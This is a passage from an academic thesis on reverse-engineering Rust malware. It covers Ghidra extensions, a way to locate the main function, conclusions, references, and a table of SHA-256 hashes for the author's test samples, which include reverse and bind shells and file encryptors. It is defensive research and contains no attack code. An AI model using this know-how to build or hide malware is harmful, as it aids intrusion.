automated tests run in the background. Some of the key behaviors to be noted during manual
dynamic analysis are:

• Modifications to the file system.

• Attempts to access sensitive or important resources.

• Network connections initiated or received.

• Registry manipulation (for Windows malware).

• Sub-processes spawned.

• Modifications to existing security controls (firewall, anti-virus, event loggers, etc.)

Once the manual dynamic analysis is completed, the analyst will have a basic understanding
of the behavior and intent of the malware. This understanding can be used to first rule out any
False Negatives (FNs) in the automated dynamic analysis report. After this, the analyst can
rule out some of the False Positives (FPs) based on the identifiers collected in Phase 1 and the

46
knowledge gained from the manual analysis. This reduces the number of records that have to
be retested, thus making the process of ruling out the large number of False Positives (FPs)
easier.

7.4 Phase 4: Code Analysis


This phase of analysis within this framework is what differs the most from the traditional
malware analysis framework. Results of this thesis showed that reverse engineering or code
analysis of malware written in the Rust programming language was difficult in Ghidra and
almost impossible in IDA.

While researching to develop this framework, valuable open-source projects and independent
blogs aiming to improve the analysis of malware written in the Rust programming language
were discovered. They are discussed below.

7.4.1 Technique to Find the Main Function

Blog posts by Matt Ehrnschwender [142] and Tristan Messner [143] discuss techniques to
locate the address to the main function of a binary written in the Rust programming language
from its disassembled output. This is particularly useful for cases where tools like Ghidra and
IDA fail to create the symbol table as discussed in Section 5.1.3 and 5.1.4.

The entry point of the program will initialize its stack cookie using "__security_init_cookie"
and perform some tasks to set up the execution environment. Then it will pass a reference to
the program's argument array, argument counter, and environment variables to a function that
will initialize the program’s main environment. Once the main environment is initialized, the
program will call “std::rt::lang_start_internal” or “std::rt::lang_start” depending on the
compiler version. The arguments to this call are the address of the main function of the
program that was written, as well as the program's argument array, environment variables
array, and argument counter. Locating this call during analysis will enable the analyst to
locate the address of the main function [142], [143].

47
7.4.2 GhidRust

GhidRust [144] an open-source project hosted on GitHub that provides a Ghidra extension
for reverse engineering and analyzing binaries written using the Rust programming language.
At the time of writing this thesis, it is actively under development and has minimal features
such as detecting if a malware is written in the Rust programming language or not and
converting the C-style decompiled output of Ghidra, to its Rust programming language
equivalent.

7.4.3 GhidraRustDependenciesExtractor

GhidraRustDependenciesExtractor [145] is an open-source project hosted on GitHub that


provides a Ghidra extension for extracting the crates used by the binary written in the Rust
programming language. At the time of writing this thesis, this project is also being actively
developed.

7.4.4 DemangleRust.py

DemangleRust.py [146] is an open-source code snippet hosted on GitHub that provides a


Ghidra extension for demangling the symbols of a binary written in the Rust programming
language using the v0 version of the mangling scheme. However, it has not been updated
since 2022.

7.5 Limitations and Future Work


Despite the strengths of the framework there are some limitations that need to be addressed.
The framework still requires manual work which can be prone to errors. Using multiple open-
source extensions brings challenges in terms of seamless integration which can impact the
ease of the analysis. Moreover, relying on a small community of open source developers
makes it difficult to get end-user support especially if the project is discontinued in the future.

To meet the current needs of malware analysis it is crucial for tool vendors to integrate the
functionalities provided by these extensions into their tools. This will ensure seamless
working and provide better support for end-users. By integrating these extensions users will
not have to rely on multiple open-source tools for analysis. This will reduce the manual effort
required and enhance the accuracy of the analysis.

48
Future work involves the creation of a single tool that can automate the phases outlined in
this framework. Such a tool would reduce the need for manual work and streamline the
analysis process. Another approach to improving the framework would be to enhance existing
tools or contribute to the open-source tools recommended in the framework. Additionally,
tool vendors should integrate the functionalities of these extensions into their tools. Overall,
the framework is a valuable starting point for analyzing malware in the Rust programming
language, but it is important to implement improvements which will help address the current
limitations and make the analysis process more accurate, efficient, and analyst-friendly.

49
8 Conclusion
This thesis investigates the characteristics of the Rust programming language that have
facilitated its usage for the creation of malware, the shortcomings of current analysis tools in
addressing this issue, and proposes potential solutions for remedying it. A mixed-methods
approach was adopted which involved a Systematic Literature Review and a cause-effect
experimentation. This approach provided a comprehensive and robust research methodology.

Through the Systematic Literature Review, it was found that there is a scarcity of academic
and individual research in this field as compared to industrial research. Results of the cause-
effect experimentation showed that the intricacies of the rustc compiler which were intended
to improve performance and security, contribute to the complexity of analysis and detection
of malware written in the Rust programming language. Existing analysis and detection tools
are not equipped with functionalities that handle these intricacies. Based on the results of
these findings, a practical framework has been proposed to analyze malware written in the
Rust programming language with ease.

The contributions of this thesis are multifold. The detailed analysis of literature provided a
comprehensive overview of the research gaps and challenges faced by researchers when
studying malware written in the Rust programming language. The results of the
experimentation offer valuable insights into why the above-mentioned gaps and challenges
occur and what can be done to overcome them. Finally, the proposed framework serves as a
starting point for future research in this field by offering a practical solution to address the
identified gaps and challenges. Overall, this thesis offers a significant contribution to the
literature on this topic, and its findings have practical implications for researchers and
practitioners in this field.

50
References
[1] O. Or-Meir, N. Nissim, Y. Elovici, and L. Rokach, “Dynamic Malware Analysis in the Modern Era - A
State of the Art Survey,” ACM Computing Surveys (CSUR), vol. 52, no. 5, pp. 1–48, 2019.
[2] L. Koch, S. Oesch, A. Chaulagain, M. Adkisson, S. Erwin, and B. Weber, “Toward the Detection of
Polyglot Files,” in Proceedings of the 15th Workshop on Cyber Security Experimentation and Test, 2022,
pp. 120–128.
[3] Statistica, “Number of malware attacks per year 2015-H1 2022.”
https://www.statista.com/statistics/873097/malware-attacks-per-year-worldwide/ (accessed Aug. 04,
2022).
[4] BlackBerry, “BlackBerry 2022 Threat Report,” Waterloo, Canada, White Paper, 2022. Accessed: Oct.
10, 2022. [Online]. Available: https://www.blackberry.com/us/en/forms/enterprise/report-bb-2022-threat-
report-pi
[5] BlackBerry, “BlackBerry Research & Intelligence, “Old Dogs, New Tricks: Attackers adopt exotic
programming languages,” Waterloo, Canada, White Paper, 2022. Accessed: Oct. 10, 2022. [Online].
Available: https://www.blackberry.com/us/en/forms/enterprise/report-old-dogs-new-tricks
[6] ITPro, “Why are ransomware gangs pivoting to Rust?,” 2022.
https://www.itpro.co.uk/security/ransomware/368476/why-are-ransomware-gangs-pivoting-to-rust
(accessed Aug. 04, 2022).
[7] Rust Blog, “Announcing Rust 1.0.” https://blog.rust-lang.org/2015/05/15/Rust-1.0.html (accessed Dec.
10, 2022).
[8] Mozilla, “Mozilla Welcomes the Rust Foundation,” 2021. https://blog.mozilla.org/en/mozilla/mozilla-
welcomes-the-rust-foundation/ (accessed Dec. 10, 2022).
[9] H. Okhravi, N. Burow, R. Skowyra, B. C. Ward, S. Jero, R. Kazan, and H. Shrobe, “One Giant Leap for
Computer Security,” IEEE Security & Privacy, vol. 18, no. 4, pp. 8–19, 2020.
[10] W. Bugden and A. Alahmar, “Rust: The Programming Language for Safety and Performance,” arXiv
preprint arXiv:2206.05503, 2022.
[11] M. Emre, R. Schroeder, K. Dewey, and B. Hardekopf, “Translating C to Safer Rust,” Proceedings of the
ACM on Programming Languages, vol. 5, no. OOPSLA, pp. 1–29, 2021.
[12] Rust For Linux, “Github: Organization for adding support for the Rust language to the Linux kernel.”
https://github.com/Rust-for-Linux (accessed Sep. 05, 2022).
[13] W. Filho, “Writing Linux Kernel Modules In Rust.” https://www.linuxfoundation.org/webinars/rust-for-
linux-writing-abstractions-and-drivers (accessed Sep. 05, 2022).
[14] M. Ojeda, “Rust For Linux: Writing Safe Abstractions & Drivers.”
https://www.linuxfoundation.org/webinars/rust-for-linux-writing-abstractions-and-drivers (accessed Sep.
05, 2022).
[15] K. Merriman, B. Campbell, and S. Larson, “New Variant of Buer Loader Written in Rust,” 2021.
Accessed: Aug. 10, 2022. [Online]. Available: https://www.proofpoint.com/us/blog/threat-insight/new-
variant-buer-loader-written-rust
[16] Microsoft Security, “Hive ransomware gets upgrades in Rust.,” 2022. Accessed: Aug. 10, 2022.
[Online]. Available: https://www.microsoft.com/en-us/security/blog/2022/07/05/hive-ransomware-gets-
upgrades-in-rust/
[17] J. Von Neumann, A. W. Burks, and others, “Theory of self-reproducing automata,” IEEE Transactions
on Neural Networks, vol. 5, no. 1, pp. 3–14, 1966.
[18] A. W. Burks, “Von Neumann’s self-reproducing automata,” MICHIGAN UNIV ANN ARBOR LOGIC
OF COMPUTERS GROUP, 1969.
[19] Kaspersky, “A Brief History of Computer Viruses & What the Future Holds.” Accessed: Aug. 10, 2022.
[Online]. Available: https://me-en.kaspersky.com/resource-center/threats/a-brief-history-of-computer-
viruses-and-what-the-future-holds
[20] Fortinet, “A Brief History of The Evolution of Malware,” 2022. Accessed: Mar. 14, 2023. [Online].
Available: https://www.fortinet.com/blog/threat-research/evolution-of-malware
[21] S. K. Sahay, A. Sharma, and H. Rathore, “Evolution of malware and its detection techniques,” in
Information and Communication Technology for Sustainable Development: Proceedings of ICT4SD
2018, Springer, 2020, pp. 139–150.

51
[22] M. N. Alenezi, H. Alabdulrazzaq, A. A. Alshaher, and M. M. Alkharang, “Evolution of malware threats
and techniques: A review,” International journal of communication networks and information security,
vol. 12, no. 3, pp. 326–337, 2020.
[23] F. Touchette, “The evolution of malware,” Network Security, vol. 2016, no. 1, pp. 11–14, 2016.
[24] M. Egele, T. Scholte, E. Kirda, and C. Kruegel, “A survey on automated dynamic malware-analysis
techniques and tools,” ACM computing surveys (CSUR), vol. 44, no. 2, pp. 1–42, 2008.
[25] E. Gandotra, D. Bansal, and S. Sofat, “Malware analysis and classification: A survey,” Journal of
Information Security, vol. 2014, 2014.
[26] M. Sikorski and A. Honig, Practical malware analysis: the hands-on guide to dissecting malicious
software. no starch press, 2012.
[27] A. Ray and A. Nath, “Introduction to Malware and Malware Analysis: A brief overview,” International
Journal, vol. 4, no. 10, 2016.
[28] R. Sihwail, K. Omar, and K. Z. Ariffin, “A survey on malware analysis techniques: Static, dynamic,
hybrid and memory analysis,” International Journal on Advances in Science, Engineering and
Information Technology, vol. 8, no. 4–2, pp. 1662–1671, 2018.
[29] Fortinet, “What is Malware Analysis?” https://www.fortinet.com/resources/cyberglossary/malware-
analysis (accessed Apr. 27, 2023).
[30] D. Vidyarthi, C. Kumar, S. Rakshit, and S. Chansarkar, “Static malware analysis to identify ransomware
properties,” International Journal of Computer Science Issues (IJCSI), vol. 16, no. 3, pp. 10–17, 2019.
[31] N. Aggarwal, P. Aggarwal, and R. Gupta, “Static malware analysis using pe header files api,” in 2022
6th International Conference on Computing Methodologies and Communication (ICCMC), IEEE, 2022,
pp. 159–162.
[32] Infosec Resources, “Static Malware Analysis.” https://resources.infosecinstitute.com/topic/malware-
analysis-basics-static-analysis/ (accessed Mar. 25, 2023).
[33] K. Baker, “Malware Analysis,” Apr. 17, 2023.
https://www.crowdstrike.com/cybersecurity-101/malware/malware-analysis/ (accessed Apr. 20, 2023).
[34] C. Willems, T. Holz, and F. Freiling, “Toward automated dynamic malware analysis using cwsandbox,”
IEEE Security & Privacy, vol. 5, no. 2, pp. 32–39, 2007.
[35] T. Shibahara, T. Yagi, M. Akiyama, D. Chiba, and T. Yada, “Efficient dynamic malware analysis based
on network behavior using deep learning,” in 2016 IEEE Global Communications Conference
(GLOBECOM), IEEE, 2016, pp. 1–7.
[36] A. Afianian, S. Niksefat, B. Sadeghiyan, and D. Baptiste, “Malware dynamic analysis evasion
techniques: A survey,” ACM Computing Surveys (CSUR), vol. 52, no. 6, pp. 1–28, 2019.
[37] L. Zeltser, “Reverse engineering malware,” Retrieved June, vol. 13, p. 2010, 2001.
[38] S. Megira, A. Pangesti, and F. Wibowo, “Malware analysis and detection using reverse engineering
technique,” in Journal of Physics: Conference Series, IOP Publishing, 2018, p. 012042.
[39] HEX Rays, “IDA Free.” Accessed: Feb. 22, 2023. [Online]. Available: https://hex-rays.com/ida-free/
[40] Hex Rays, “IDA Pro.” Accessed: Feb. 22, 2023. [Online]. Available: https://hex-rays.com/ida-pro/
[41] O. Yuschuk, “OllyDbg.” https://www.ollydbg.de/ (accessed Feb. 20, 2023).
[42] National Security Agency, “Ghidra.” Accessed: Feb. 22, 2023. [Online]. Available: https://ghidra-
sre.org/
[43] The Rust Programming Language, “The rustc book.” https://doc.rust-lang.org/rustc/what-is-rustc.html
(accessed Apr. 25, 2023).
[44] C. Lattner and V. Adve, “The LLVM Compiler Framework and Infrastructure Tutorial,” in International
Workshop on Languages and Compilers for Parallel Computing, Springer, 2004, pp. 15–16.
[45] C. Lattner and V. Adve, “LLVM: A compilation framework for lifelong program analysis &
transformation,” in International Symposium on Code Generation and Optimization, 2004. CGO 2004.,
IEEE, 2004, pp. 75–86.
[46] M. Woerister, “Incremental Compilation.” https://blog.rust-lang.org/2016/09/08/incremental.html
(accessed Apr. 25, 2023).
[47] The Rust Programming Language, “The rustup book.” https://rust-lang.github.io/rustup/cross-
compilation.html (accessed Apr. 25, 2023).
[48] Mingw.org, “MinGW-w64.” Accessed: Feb. 22, 2023. [Online]. Available: https://www.mingw-w64.org/
[49] T. Rothwell and J. Youngman, “The GNU C Reference Manual,” Free Software Foundation, Inc, p. 86,
2007.

52
[50] R. M. Stallman, “GNU Compiler Collection Internals,” Free Software Foundation, 2002.
[51] Microsoft, “MSVC.” Accessed: Feb. 22, 2023. [Online]. Available:
https://learn.microsoft.com/en-us/cpp/build/reference/compiler-options?view=msvc-170
[52] Microsoft, “Visual Studio IDE.” Accessed: Feb. 22, 2023. [Online]. Available:
https://visualstudio.microsoft.com/vs/features/cplusplus/
[53] Y. Xiao and M. Watson, “Guidance on conducting a systematic literature review,” Journal of planning
education and research, vol. 39, no. 1, pp. 93–112, 2019.
[54] ImmunityInc, “Immunity Debugger.” https://www.immunityinc.com/products/debugger/ (accessed Feb.
22, 2023).
[55] Palo Alto, “BlackCat Ransomware,” 2021. https://unit42.paloaltonetworks.com/atoms/blackcat-
ransomware/ (accessed Nov. 02, 2023).
[56] Microsoft Security, “The many lives of BlackCat ransomware.” Accessed: Aug. 10, 2022. [Online].
Available: https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-
ransomware/
[57] H. Aver, “BlackCat — new player in the ransomware business,” 2022. Accessed: Aug. 10, 2022.
[Online]. Available: https://me-en.kaspersky.com/blog/black-cat-ransomware/19541/
[58] Kaspersky, “A Bad Luck BlackCat,” 2022. Accessed: Dec. 02, 2023. [Online]. Available:
https://securelist.com/a-bad-luck-blackcat/106254/
[59] Kaspersky, “New ransomware: A cross-platform future,” 2022. Accessed: Apr. 25, 2023. [Online].
Available: https://me-en.kaspersky.com/blog/luna-blackbasta-ransomware/19860/
[60] M. Rivero, J. V. Wiel, D. Galov, and S. Lozhkin, “Luna and Black Basta - New ransomware for
Windows, Linux and ESXi,” 2022. Accessed: Apr. 25, 2023. [Online]. Available:
https://securelist.com/luna-black-basta-ransomware/106950/
[61] BlackBerry, “Luca Stealer Targets Password Managers and Cryptocurrency Wallets,” 2022. Accessed:
Aug. 10, 2022. [Online]. Available: https://blogs.blackberry.com/en/2022/08/luca-stealer-targets-
password-managers-and-cryptocurrency-wallets
[62] TrendMicro, “New Nokoyawa Ransomware Possibly Related to Hive,” 2022. Accessed: Apr. 25, 2023.
[Online]. Available: https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-
related-to-hive-.html
[63] ZScaler, “Nokoyawa Ransomware: Rust or Bust,” 2022. Accessed: Apr. 25, 2023. [Online]. Available:
https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust
[64] IBM Security X-Force, “RansomExx Upgrades to Rust,” 2022. Accessed: Apr. 01, 2023. [Online].
Available: https://securityintelligence.com/posts/ransomexx-upgrades-rust/
[65] TrendMicro, “Agenda Ransomware Uses Rust to Target More Vital Industries,” 2022. Accessed: Mar.
03, 2023. [Online]. Available: https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-
uses-rust-to-target-more-vital-industries.html
[66] McAfee, “BinText.” Accessed: Mar. 03, 2022. [Online]. Available:
http://b2b-download.mcafee.com/products/tools/foundstone/bintext303
[67] HIEW, “Hiew.” Accessed: Feb. 22, 2023. [Online]. Available: https://hiew.ru
[68] Jamf Threat Labs, “BlueNoroff APT group targets macOS with ‘RustBucket’ Malware,” 2023.
Accessed: Apr. 26, 2023. [Online]. Available: https://www.jamf.com/blog/bluenoroff-apt-targets-macos-
rustbucket-malware/
[69] M. Kiely, “The Crown: Exploratory Analysis of Nim Malware - DC615/DEF CON Nashville.”
https://github.com/HuskyHacks/the-crown-defcon615 (accessed Oct. 01, 2022).
[70] M. Kiely, “HuskyHacks, The Crown: Exploratory Analysis of Nim Malware - DC615/DEF CON
Nashville,” Jan. 2022. Accessed: Oct. 01, 2022. [Online]. Available: https://www.youtube.com/watch?
v=mCWzEh8gJuk
[71] B. Kurtz, “DEF CON 29 - Ben Kurtz - Offensive Golang Bonanza: Writing Golang Malware,” Aug.
2021. Accessed: Oct. 02, 2022. [Online]. Available: https://www.youtube.com/watch?v=3RQb05ITSyk
[72] C. Seese and S. McMurray, “BSides DC 2019 - Hands-on Writing Malware in Go,” Oct. 2019.
Accessed: Oct. 02, 2022. [Online]. Available: https://www.youtube.com/watch?v=2cGsTEkDkT8
[73] A. Adhikari and P. A. Kulkarni, “Using the Strings Metadata to Detect the Source Language of the
Binary,” in Proceedings of the ICR’22 International Conference on Innovations in Computing Research,
K. Daimi and A. Al Sadoon, Eds., Cham: Springer International Publishing, 2022, pp. 190–200.

53
[74] S. Akabane and T. Okamoto, “Identification of toolchains used to build IoT malware with statically
linked libraries,” Procedia Computer Science, vol. 192, pp. 5130–5138, 2021.
[75] A. Küchler and C. Banse, “Representing LLVM-IR in a Code Property Graph,” in International
Conference on Information Security, Springer, 2022, pp. 360–380.
[76] T. Tamboli, T. H. Austin, and M. Stamp, “Metamorphic code generation from LLVM bytecode,” Journal
of Computer Virology and Hacking Techniques, vol. 10, no. 3, pp. 177–187, 2014.
[77] T. E. Dube, B. D. Birrer, R. A. Raines, R. O. Baldwin, B. E. Mullins, R. W. Bennington, and C. E.
Reuter, “Hindering reverse engineering: Thinking outside the box,” IEEE Security & Privacy, vol. 6, no.
2, pp. 58–65, 2008.
[78] S. Bhansali, A. Aris, A. Acar, H. Oz, and A. S. Uluagac, “A First Look at Code Obfuscation for
WebAssembly,” in Proceedings of the 15th ACM Conference on Security and Privacy in Wireless and
Mobile Networks, 2022, pp. 140–145.
[79] Ytisf, “TheZoo - A Live Malware Repository.” https://github.com/ytisf/theZoo (accessed Aug. 04, 2022).
[80] VXUnderground, “Malware Source Code.” https://github.com/vxunderground/MalwareSourceCode
(accessed Aug. 04, 2022).
[81] MITRE, “ATT&CK.” https://attack.mitre.org/ (accessed Apr. 25, 2023).
[82] B. J. Kwon, J. Mondal, J. Jang, L. Bilge, and T. Dumitraş, “The dropper effect: Insights into malware
distribution with downloader graph analytics,” in Proceedings of the 22nd ACM SIGSAC Conference on
Computer and Communications Security, 2015, pp. 1118–1129.
[83] U. Bayer, I. Habibi, D. Balzarotti, E. Kirda, and C. Kruegel, “A View on Current Malware Behaviors.,”
in LEET, 2009.
[84] P. O’Kane, S. Sezer, and D. Carlin, “Evolution of ransomware,” Iet Networks, vol. 7, no. 5, pp. 321–327,
2018.
[85] Z. Akhtar, “Malware detection and analysis: Challenges and research opportunities,” arXiv preprint
arXiv:2101.08429, 2021.
[86] G. Palavicini, “Bridging the detection gap: a study on a behavior-based approach using malware
techniques,” 2014.
[87] S. Kuraku and D. Kalla, “Emotet malware—a banking credentials stealer,” Iosr J. Comput. Eng, vol. 22,
pp. 31–41, 2020.
[88] G. Wangen, “The role of malware in reported cyber espionage: a review of the impact and mechanism,”
Information, vol. 6, no. 2, pp. 183–211, 2015.
[89] A. R. A. Grégio, D. S. Fernandes, V. M. Afonso, P. L. de Geus, V. F. Martins, and M. Jino, “An empirical
analysis of malicious internet banking software behavior,” in Proceedings of the 28th Annual ACM
Symposium on Applied Computing, 2013, pp. 1830–1835.
[90] P.-M. Bureau and C. Dietrich, “Hiding in Plain Sight.” Black Hat, 2015.
[91] W. Mazurczyk and L. Caviglione, “Information hiding as a challenge for malware detection,” arXiv
preprint arXiv:1504.04867, 2015.
[92] S. Sheridan and A. Keane, “Improving the stealthiness of dns-based covert communication,” in
European Conference on Cyber Warfare and Security, Academic Conferences International Limited,
2017, pp. 433–441.
[93] U. Bayer, C. Kruegel, and E. Kirda, TTAnalyze: A tool for analyzing malware. na, 2006.
[94] A. Tajoddin and M. Abadi, “RAMD: registry-based anomaly malware detection using one-class
ensemble classifiers,” Applied Intelligence, vol. 49, pp. 2641–2658, 2019.
[95] K. Oosthoek and C. Doerr, “Sok: Att&ck techniques and trends in windows malware,” in Security and
Privacy in Communication Networks: 15th EAI International Conference, SecureComm 2019, Orlando,
FL, USA, October 23-25, 2019, Proceedings, Part I 15, Springer, 2019, pp. 406–425.
[96] S. Sagiroglu and G. Canbek, “Keyloggers: Increasing threats to computer security and privacy,” IEEE
technology and society magazine, vol. 28, no. 3, pp. 10–17, 2009.
[97] Y. A. Ahmed, M. A. Maarof, F. M. Hassan, and M. M. Abshir, “Survey of Keylogger technologies,”
International journal of computer science and telecommunications, vol. 5, no. 2, 2014.
[98] A. Bhardwaj and S. Goundar, “Keyloggers: silent cyber security weapons,” Network Security, vol. 2020,
no. 2, pp. 14–19, 2020.
[99] Remnux.org, “REMNux: A Linux Toolkit for Malware Analysts.” Accessed: Feb. 22, 2023. [Online].
Available: https://remnux.org

54
[100] Virus Total, “About us.” https://support.virustotal.com/hc/en-us/categories/360000160117-About-us
(accessed Dec. 01, 2022).
[101] Virus Total, “Contributors.” https://support.virustotal.com/hc/en-us/articles/115002146809-Contributors
(accessed Dec. 01, 2022).
[102] VirusTotal, “Att&CK techniques.” https://developers.virustotal.com/reference/attack_techniques-5
(accessed Apr. 25, 2023).
[103] G. P. Spathoulas and S. K. Katsikas, “Reducing false positives in intrusion detection systems,”
computers & security, vol. 29, no. 1, pp. 35–44, 2010.
[104] P. Vinod, R. Jaipur, V. Laxmi, and M. Gaur, “Survey on malware detection methods,” in Proceedings of
the 3rd Hackers’ Workshop on computer and internet security (IITKHACK’09), 2009, pp. 74–79.
[105] The Rust Programming Language, “Crate std.” https://doc.rust-lang.org/std/ (accessed Apr. 20, 2023).
[106] The Rust Programming Language, “The Rust runtime.” https://doc.rust-lang.org/reference/runtime.html
(accessed Apr. 20, 2023).
[107] The Rust Programming Language, “Module Thread,” Apr. 20, 2023. https://doc.rust-lang.org/std/thread/
(accessed Apr. 25, 2023).
[108] The Rust Programming Language, “Fearless Concurrency,” Apr. 20, 2023.
https://doc.rust-lang.org/book/ch16-00-concurrency.html (accessed Apr. 25, 2023).
[109] The Rust Programming Language, “Crate syscalls,” Apr. 20, 2023. https://docs.rs/syscalls/latest/syscalls/
(accessed Apr. 25, 2023).
[110] Users Forum of the Rust Programming Language, “Size of the executable binary file of an application.”
https://users.rust-lang.org/t/size-of-the-executable-binary-file-of-an-application/62160 (accessed Apr. 20,
2023).
[111] The Rust Programming Language, “Linkage: The Rust Reference.”
https://doc.rust-lang.org/reference/linkage.html (accessed Apr. 21, 2023).
[112] The Rust Programming Language, “Inlining.” https://nnethercote.github.io/perf-book/inlining.html
(accessed Apr. 21, 2023).
[113] The Rust Programming Language, “Code generation attributes.”
https://doc.rust-lang.org/nightly/reference/attributes/codegen.html?highlight=inline (accessed Apr. 21,
2023).
[114] The Rust Programming Language, “Crate unroll.” https://docs.rs/unroll/latest/unroll/ (accessed Apr. 21,
2023).
[115] H. Jin, “A Loop Flattening Pass in LLVM,” Dec. 20, 2020.
https://www.cs.cornell.edu/courses/cs6120/2020fa/blog/loop-flatten/ (accessed Apr. 21, 2023).
[116] The Rust Programming Language, “Optimizations: The speed size tradeoff.” https://docs.rust-
embedded.org/book/unsorted/speed-vs-size.html (accessed Apr. 23, 2023).
[117] “Cargo Profiles.” https://doc.rust-lang.org/cargo/reference/profiles.html (accessed Apr. 23, 2023).
[118] The Rust Programming Language, “Customizing Builds with Release Profiles.” https://doc.rust-
lang.org/book/ch14-01-release-profiles.html (accessed Apr. 23, 2023).
[119] Z. Dmitry, “GitHub: Source file names are included into a release binary even if abort upon panic is
enabled,” Aug. 07, 2020. https://github.com/rust-lang/rust/issues/75263 (accessed Apr. 23, 2023).
[120] Mzji, “GitHub: Enable remap-path-prefix for absolute paths by default,” Mar. 15, 2017.
https://github.com/rust-lang/rust/issues/40552 (accessed Apr. 23, 2023).
[121] Trickster0, “OffensiveRust.” https://github.com/trickster0/OffensiveRust (accessed Apr. 24, 2023).
[122] The Rust Programming Language, “Crate mangling.” https://docs.rs/mangling/latest/mangling/
(accessed Apr. 22, 2023).
[123] Users Forum of the Rust Programming Language, “Why Rust has name mangling.” https://internals.rust-
lang.org/t/why-rust-has-name-mangling/12503/1 (accessed Apr. 22, 2023).
[124] Ghidra, “Interface SymbolTable.”
https://ghidra.re/ghidra_docs/api/ghidra/program/model/symbol/SymbolTable.html (accessed Apr. 20,
2023).
[125] D. Lukan, “The basics of IDA pro,” May 11, 2018. https://resources.infosecinstitute.com/topic/basics-of-
ida-pro-2/ (accessed Apr. 20, 2023).
[126] The Rust Programming Language, “Exceptions.”
https://doc.rust-lang.org/beta/embedded-book/start/exceptions.html (accessed Apr. 18, 2023).

55
[127] The Rust Programming Language, “Error Handling.” https://doc.rust-lang.org/book/ch09-00-error-
handling.html (accessed Apr. 19, 2023).
[128] The Rust Programming Language, “Macro std::panic.” https://doc.rust-lang.org/std/macro.panic.html
(accessed Apr. 19, 2023).
[129] M. Al-Asli and T. A. Ghaleb, “Review of Signature-based Techniques in Antivirus Products,” in 2019
International Conference on Computer and Information Sciences (ICCIS), 2019, pp. 1–6. doi:
10.1109/ICCISci.2019.8716381.
[130] J. Scott, “Signature based malware detection is dead,” Institute for Critical Infrastructure Technology,
2017.
[131] G. Canfora, A. Di Sorbo, F. Mercaldo, and C. A. Visaggio, “Obfuscation techniques against signature-
based detection: a case study,” in 2015 Mobile systems technologies workshop (MST), IEEE, 2015, pp.
21–26.
[132] P. O’Kane, S. Sezer, and K. McLaughlin, “Obfuscation: The hidden malware,” IEEE Security &
Privacy, vol. 9, no. 5, pp. 41–47, 2011.
[133] T. Muralidharan, A. Cohen, N. Gerson, and N. Nissim, “File Packing from the Malware Perspective:
Techniques, Analysis Approaches, and Directions for Enhancements,” ACM Computing Surveys, vol. 55,
no. 5, pp. 1–45, 2022.
[134] W. Yan, Z. Zhang, and N. Ansari, “Revealing packed malware,” ieee seCurity & PrivaCy, vol. 6, no. 5,
pp. 65–69, 2008.
[135] A. A. Elhadi, M. A. Maarof, and A. H. Osman, “Malware detection based on hybrid signature behaviour
application programming interface call graph,” American Journal of Applied Sciences, vol. 9, no. 3, p.
283, 2012.
[136] A. K. Chakravarty, A. Raj, S. Paul, and S. Apoorva, “A study of signature-based and behaviour-based
malware detection approaches,” Int. J. Adv. Res. Ideas Innov. Technol., vol. 5, no. 3, pp. 1509–1511,
2019.
[137] MITRE ATT&CK, “Obfuscated Files or Information.” https://attack.mitre.org/techniques/T1027/
(accessed Mar. 03, 2023).
[138] MITRE ATT&CK, “Impair Defenses: Disable or Modify Tools.”
https://attack.mitre.org/techniques/T1562/001/ (accessed Mar. 03, 2023).
[139] Ö. Aslan and R. Samet, “Investigation of possibilities to detect malware using existing tools,” in 2017
IEEE/ACS 14th International Conference on Computer Systems and Applications (AICCSA), IEEE,
2017, pp. 1277–1284.
[140] Y. Prayudi, I. Riadi, and others, “Implementation of malware analysis using static and dynamic analysis
method,” International Journal of Computer Applications, vol. 117, no. 6, 2015.
[141] Zer0x64, “GitHub: Rust language analysis.”
https://github.com/NationalSecurityAgency/ghidra/issues/141 (accessed Jan. 30, 2023).
[142] M. Ehrnschwender, “Digging through Rust to find Gold: Extracting Secrets from Rust Malware,” Aug.
23, 2022. https://www.binarydefense.com/resources/blog/digging-through-rust-to-find-gold-extracting-
secrets-from-rust-malware/ (accessed Apr. 03, 2023).
[143] T. Messner, “Bite Sized Rust RE: 1 Deconstructing Hello World,” May 19, 2020.
https://rayoflightz.github.io/about/ (accessed Apr. 03, 2023).
[144] D. Maroo, “GhidRust.” Accessed: Apr. 27, 2023. [Online]. Available:
https://github.com/DMaroo/GhidRust
[145] BinaryDefense, “Ghidra Rust Dependencies Extractor.” Accessed: Apr. 26, 2023. [Online]. Available:
https://github.com/BinaryDefense/GhidraRustDependenciesExtractor
[146] J. Grigg, “Demangle Rust.” Accessed: Apr. 28, 2023. [Online]. Available:
https://gist.github.com/str4d/e541f4c28e2bca80d222434ac1a204f4

56
Appendix A
Signatures of the Sub-categories of Malware Tested

The SHA-256 hashes of the sub-categories of malware samples developed for Experiment 1
and Experiment 2 are provided in this table. These malware signatures are now in
VirusTotal’s database, and the results can be viewed using the hash strings.

Sub-category of Rust Programming


C Programming Language
Malware Language
bb32836fae329ce8ac0f21bb119069d
8e2d94b0ffb46efe790f0ab4fd9a197d92
Delete files c59391b40f5781fef696bffa2710f7
706dd0f84060234cf6369661b1e3a8d
d1
8f06ecb38fd99833d662c1284b5682c
297359bfe3769cdecf7fa5250a1ef94216
Encrypt files 2b1a2ef2fad10d64fab7a6f4e051be
e47213cdcbccc188452d2d38e984b66
54
2fef4c438254e829cd5d5003a07b168
35c5df8905208af21f14df3aca052fb38f
Create files 904ac0ca36426e6ac3124f8e77d7a6
9344081d272db3454a37a1a1548168
66f
d5c02513079e89803437d4158fc4e77
8cd1cfea6aa8482d6c00ed93b0a17f069
Modify file 84572c45b98266a4ef3c3dd87650800
5930765db3f9b33e5a0ce9ab101a471
ac
c6831d1d8bc153d8b9d803dff58be18
797d9a916f2cf9efde4aeb19c9554b3756
Simple reverse shell 8115b52854bc4fb9fe9f1996523734
ae6a306ddfc93da790c71fc5832352b
a8
3c729243893e9b7ca22ac1fc13b4a73
f6141fda3df6c7a5567a272ad25d46f862
Simple bind shell ea396f52fc0562d81ce2494b4e6bbe
3f22632b2b70d083677cad581638f39
29
32f6ae89e042e5ad8deb60393e67e598a dd13f2f6c8e217b983fff9be0186e1c4
Obfuscated reverse shell c6f2fe5e45d4f18a8984717f02470d7 15a867117c6adc6adff7cc0d5567ef65
99dba94fe13c0d3dd428fc2037bd292
